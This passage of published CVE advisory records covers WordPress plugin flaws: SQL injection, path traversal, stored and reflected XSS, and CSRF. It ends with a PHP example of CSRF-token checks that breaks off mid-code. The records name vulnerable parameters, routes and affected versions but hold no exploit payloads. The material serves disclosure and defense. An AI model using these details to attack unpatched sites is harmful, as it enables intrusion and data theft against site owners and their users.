          "value": "The GeekyBot \u2014 Generate AI Content Without Prompt, Chatbot and Lead Generation plugin for WordPress is vulnerable to SQL Injection via the \u0027attributekey\u0027 parameter in versions up to, and including, 1.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "CWE-89 Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T03:37:36.890Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4c716fd3-6297-4b3a-a796-65f68f2986cf?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset/3474168/geeky-bot"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-03-02T19:13:32.000Z",
          "value": "Vendor Notified"
        },
        {
          "lang": "en",
          "time": "2026-05-04T15:06:44.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "GeekyBot \u2014 Generate AI Content Without Prompt, Chatbot and Lead Generation \u003c= 1.2.0 - Unauthenticated SQL Injection via \u0027attributekey\u0027"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-3456",
    "datePublished": "2026-05-05T03:37:36.890Z",
    "dateReserved": "2026-03-02T18:58:06.506Z",
    "dateUpdated": "2026-05-05T03:37:36.890Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-1921 (GCVE-0-2026-1921)

Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
Title
Loco Translate <= 2.8.2 - Authenticated (Translator+) Path Traversal to Limited File Read via 'ref' Parameter
Summary
The Loco Translate plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.8.2 via the `fsReference` AJAX route. This is due to the `findSourceFile()` method normalizing user-supplied `ref` paths containing `../` directory traversal sequences without validating that the resolved path remains within the intended bundle or content directory. This makes it possible for authenticated attackers, with Translator-level access and above (custom `loco_admin` capability required, granted to the `translator` role and administrators by default), to read arbitrary `.php`, `.js`, `.json`, and `.twig` files from the server filesystem outside the intended translation directory. Files named wp-config.php are excluded.
CWE
  • CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
Wordfence
Impacted products
Vendor: timwhitlock
Product: Loco Translate
Affected versions: from 0 up to and including 2.8.2 (semver)
Credits
Angus Girvan

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Loco Translate",
          "vendor": "timwhitlock",
          "versions": [
            {
              "lessThanOrEqual": "2.8.2",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Angus Girvan"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Loco Translate plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.8.2 via the `fsReference` AJAX route. This is due to the `findSourceFile()` method normalizing user-supplied `ref` paths containing `../` directory traversal sequences without validating that the resolved path remains within the intended bundle or content directory. This makes it possible for authenticated attackers, with Translator-level access and above (custom `loco_admin` capability required, granted to the `translator` role and administrators by default), to read arbitrary `.php`, `.js`, `.json`, and `.twig` files from the server filesystem outside the intended translation directory. Files named wp-config.php are excluded."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T02:26:59.132Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f9ff3058-a08c-40ed-b756-81e703b2277a?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/loco-translate/tags/2.8.1/src/ajax/FsReferenceController.php#L12"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/loco-translate/trunk/src/ajax/FsReferenceController.php#L12"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/loco-translate/tags/2.8.1/src/ajax/FsReferenceController.php#L92"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/loco-translate/trunk/src/ajax/FsReferenceController.php#L92"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset/3482475/loco-translate/trunk/tpl/admin/config/version.php"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Floco-translate/tags/2.8.2\u0026new_path=%2Floco-translate/tags/2.8.3"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-05-04T13:32:17.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "Loco Translate \u003c= 2.8.2 - Authenticated (Translator+) Path Traversal to Limited File Read via \u0027ref\u0027 Parameter"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-1921",
    "datePublished": "2026-05-05T02:26:59.132Z",
    "dateReserved": "2026-02-04T17:33:59.876Z",
    "dateUpdated": "2026-05-05T02:26:59.132Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-5505 (GCVE-0-2026-5505)

Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
Title
WP-Clippy <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes
Summary
The WP-Clippy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `clippy` shortcode in all versions up to, and including, 1.0.0. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CWE
  • CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
Wordfence
Impacted products
Vendor: bitacre
Product: WP-Clippy
Affected versions: from 0 up to and including 1.0.0 (semver)
Credits
zakaria

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "WP-Clippy",
          "vendor": "bitacre",
          "versions": [
            {
              "lessThanOrEqual": "1.0.0",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "zakaria"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The WP-Clippy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin\u0027s `clippy` shortcode in all versions up to, and including, 1.0.0. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T02:26:58.744Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ec49ed83-a09d-460d-be34-0fb79032b543?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/wp-clippy/tags/1.0.0/wp-clippy.php#L23"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/wp-clippy/trunk/wp-clippy.php#L23"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/wp-clippy/tags/1.0.0/wp-clippy.php#L26"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/wp-clippy/trunk/wp-clippy.php#L26"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-05-04T14:06:40.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "WP-Clippy \u003c= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-5505",
    "datePublished": "2026-05-05T02:26:58.744Z",
    "dateReserved": "2026-04-03T16:08:43.449Z",
    "dateUpdated": "2026-05-05T02:26:58.744Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-6255 (GCVE-0-2026-6255)

Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
Title
Simple Owl Shortcodes <= 2.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'num' Shortcode Attribute
Summary
The Simple Owl Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'num' attribute of the 'owls_wrapper' shortcode in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CWE
  • CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
Wordfence
Impacted products
Vendor: sszdh
Product: Simple Owl Shortcodes
Affected versions: from 0 up to and including 2.1.1 (semver)
Credits
nail majdeddine

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Simple Owl Shortcodes",
          "vendor": "sszdh",
          "versions": [
            {
              "lessThanOrEqual": "2.1.1",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "nail majdeddine"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Simple Owl Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u0027num\u0027 attribute of the \u0027owls_wrapper\u0027 shortcode in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T02:26:58.401Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e33a2f27-20c2-4963-9558-1eead0515690?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/simple-owl-shortcodes/tags/2.1.1/inc/owls_wrapper.php#L11"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/simple-owl-shortcodes/trunk/inc/owls_wrapper.php#L11"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-05-04T14:06:27.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "Simple Owl Shortcodes \u003c= 2.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via \u0027num\u0027 Shortcode Attribute"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-6255",
    "datePublished": "2026-05-05T02:26:58.401Z",
    "dateReserved": "2026-04-13T20:56:16.310Z",
    "dateUpdated": "2026-05-05T02:26:58.401Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-6704 (GCVE-0-2026-6704)

Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
Title
Blog Settings <= 1.0 - Reflected Cross-Site Scripting via 'page' Parameter
Summary
The Blog Settings plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
CWE
  • CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
Wordfence
Impacted products
Vendor: phpsandeepkumar
Product: Blog Settings
Affected versions: from 0 up to and including 1.0 (semver)
Credits
Julian Chibuike Nwadinobi

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Blog Settings",
          "vendor": "phpsandeepkumar",
          "versions": [
            {
              "lessThanOrEqual": "1.0",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Julian Chibuike Nwadinobi"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Blog Settings plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u0027page\u0027 parameter in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T02:26:58.006Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d28e5374-dd34-4745-a20b-059e9846d96d?source=cve"
        },
        {
          "url": "https://wordpress.org/plugins/blog-settings/"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/blog-settings/tags/1.0/blog-settings.php#L173"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/blog-settings/tags/1.0/blog-settings.php#L46"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-05-04T14:07:42.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "Blog Settings \u003c= 1.0 - Reflected Cross-Site Scripting via \u0027page\u0027 Parameter"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-6704",
    "datePublished": "2026-05-05T02:26:58.006Z",
    "dateReserved": "2026-04-20T17:55:04.098Z",
    "dateUpdated": "2026-05-05T02:26:58.006Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-2868 (GCVE-0-2026-2868)

Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
Title
Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem <= 3.5.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'separatorIconSVG'
Summary
The Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'separatorIconSVG' parameter in versions up to, and including, 3.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CWE
  • CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
Wordfence
Impacted products
Vendor: jegstudio
Product: Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem
Affected versions: from 0 up to and including 3.5.3 (semver)
Credits
Athiwat Tiprasaharn

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Gutenverse \u2013 Ultimate WordPress FSE Blocks Addons \u0026 Ecosystem",
          "vendor": "jegstudio",
          "versions": [
            {
              "lessThanOrEqual": "3.5.3",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Athiwat Tiprasaharn"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Gutenverse \u2013 Ultimate WordPress FSE Blocks Addons \u0026 Ecosystem plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u0027separatorIconSVG\u0027 parameter in versions up to, and including, 3.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T02:26:57.635Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cc540e5c-180f-4743-b1fb-608aa0e3ae79?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset/3507804/gutenverse"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-02-20T18:23:49.000Z",
          "value": "Vendor Notified"
        },
        {
          "lang": "en",
          "time": "2026-05-04T14:22:31.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "Gutenverse \u2013 Ultimate WordPress FSE Blocks Addons \u0026 Ecosystem \u003c= 3.5.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via \u0027separatorIconSVG\u0027"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-2868",
    "datePublished": "2026-05-05T02:26:57.635Z",
    "dateReserved": "2026-02-20T14:31:17.028Z",
    "dateUpdated": "2026-05-05T02:26:57.635Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-6702 (GCVE-0-2026-6702)

Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
Title
Publish 2 Ping.fm <= 1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting via 'wpPingPingKey' Parameter
Summary
The Publish 2 Ping.fm plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the '/wp-admin/options-general.php?page=admin.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
CWE
  • CWE-352 - Cross-Site Request Forgery (CSRF)
Assigner
Wordfence
Impacted products
Vendor: foux
Product: Publish 2 Ping.fm
Affected versions: from 0 up to and including 1.1 (semver)
Credits
Muhammad Nur Ibnu Hubab

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Publish 2 Ping.fm",
          "vendor": "foux",
          "versions": [
            {
              "lessThanOrEqual": "1.1",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Muhammad Nur Ibnu Hubab"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Publish 2 Ping.fm plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the \u0027/wp-admin/options-general.php?page=admin.php\u0027 page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-352",
              "description": "CWE-352 Cross-Site Request Forgery (CSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T02:26:57.145Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c0dc5349-139a-4bf3-8503-0e75b132c68c?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/publish-2-pingfm/trunk/php/admin.php#L136"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/publish-2-pingfm/tags/1.1/php/admin.php#L136"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/publish-2-pingfm/trunk/php/admin.php#L76"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/publish-2-pingfm/tags/1.1/php/admin.php#L76"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/publish-2-pingfm/trunk/php/prefs.php#L219"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/publish-2-pingfm/tags/1.1/php/prefs.php#L219"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-05-04T14:07:17.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "Publish 2 Ping.fm \u003c= 1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting via \u0027wpPingPingKey\u0027 Parameter"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-6702",
    "datePublished": "2026-05-05T02:26:57.145Z",
    "dateReserved": "2026-04-20T17:30:27.953Z",
    "dateUpdated": "2026-05-05T02:26:57.145Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-6700 (GCVE-0-2026-6700)

Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
Title
DX Sources <= 2.0.1 - Cross-Site Request Forgery to Settings Update
Summary
The DX Sources plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.1. This is due to missing or incorrect nonce validation on the settings_page_build function. This makes it possible for unauthenticated attackers to modify the plugin's configuration options via a forged request, granted they can trick a logged-in site administrator into performing an action such as clicking on a link.
CWE
  • CWE-352 - Cross-Site Request Forgery (CSRF)
Assigner
Impacted products
Vendor Product Version
xavortm DX Sources Affected: 0 , ≤ 2.0.1 (semver)
Credits
Muhammad Afnaan

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "DX Sources",
          "vendor": "xavortm",
          "versions": [
            {
              "lessThanOrEqual": "2.0.1",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Muhammad Afnaan"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The DX Sources plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.1. This is due to missing or incorrect nonce validation on the settings_page_build function. This makes it possible for unauthenticated attackers to modify the plugin\u0027s configuration options via a forged request, granted they can trick a logged-in site administrator into performing an action such as clicking on a link."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-352",
              "description": "CWE-352 Cross-Site Request Forgery (CSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T02:26:56.787Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c96e57-0300-4ea7-a0c6-5d060b6e979d?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/dx-sources/trunk/inc/settings.class.php#L46"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/dx-sources/tags/2.0.1/inc/settings.class.php#L46"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/dx-sources/trunk/inc/settings.class.php#L79"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/dx-sources/tags/2.0.1/inc/settings.class.php#L79"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-05-04T14:06:52.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "DX Sources \u003c= 2.0.1 - Cross-Site Request Forgery to Settings Update"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-6700",
    "datePublished": "2026-05-05T02:26:56.787Z",
    "dateReserved": "2026-04-20T17:26:47.833Z",
    "dateUpdated": "2026-05-05T02:26:56.787Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}
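The two CSRF records above (Publish 2 Ping.fm, DX Sources) and the addfreespace record further down this page share one root cause: a settings handler that acts on any request arriving with an administrator's cookies. The PHP below is an added example, not code from any of these plugins or from WordPress core. It shows the two checks such a handler needs, a capability check and a request token bound to user, action and time, using a simplified HMAC token as a stand-in for WordPress' wp_create_nonce()/check_admin_referer(). The SECRET constant, the $session and $request arrays and the 'ping_key' option name are assumptions made for the demonstration.

```php
<?php
declare(strict_types=1);

// Added example: simplified CSRF-token scheme (NOT the WordPress nonce API).
const SECRET = 'server-side-secret-never-sent-to-the-browser'; // assumption: would come from config
const TOKEN_LIFETIME = 12 * 3600;                                 // tokens valid across two 12-hour buckets

/** Token bound to the user, the action and a time bucket; forgeable only with SECRET. */
function make_csrf_token(int $user_id, string $action, ?int $now = null): string {
    $tick = intdiv($now ?? time(), TOKEN_LIFETIME);
    return hash_hmac('sha256', "$tick|$user_id|$action", SECRET);
}

/** Accept the current or the previous bucket; compare in constant time. */
function verify_csrf_token(string $token, int $user_id, string $action, ?int $now = null): bool {
    $now = $now ?? time();
    foreach ([0, TOKEN_LIFETIME] as $back) {
        if (hash_equals(make_csrf_token($user_id, $action, $now - $back), $token)) {
            return true;
        }
    }
    return false;
}

/** Output-context escaping for the settings form: the stored value is data, not markup. */
function render_setting_field(string $name, string $value): string {
    return sprintf('<input type="text" name="%s" value="%s">',
        htmlspecialchars($name, ENT_QUOTES, 'UTF-8'),
        htmlspecialchars($value, ENT_QUOTES, 'UTF-8'));
}

/**
 * Settings-update handler. $session stands in for the logged-in user and
 * $request for $_POST (both assumptions). Returns the updated options, or
 * null when the request is refused.
 */
function handle_settings_update(array $session, array $request, array $options): ?array {
    // 1. Authorization: only users allowed to manage options get this far.
    if (empty($session['can_manage_options'])) {
        return null;
    }
    // 2. Anti-CSRF: the token only appears in a form this site rendered for this
    //    user, so a page on another origin cannot supply it. This is the check the
    //    records above describe as "missing or incorrect nonce validation".
    $token = (string)($request['_token'] ?? '');
    if ($token === '' || !verify_csrf_token($token, (int)$session['user_id'], 'update-settings')) {
        return null;
    }
    $options['ping_key'] = (string)($request['ping_key'] ?? ''); // hypothetical option name
    return $options;
}

$admin   = ['user_id' => 1, 'can_manage_options' => true];
$options = ['ping_key' => 'old-key'];

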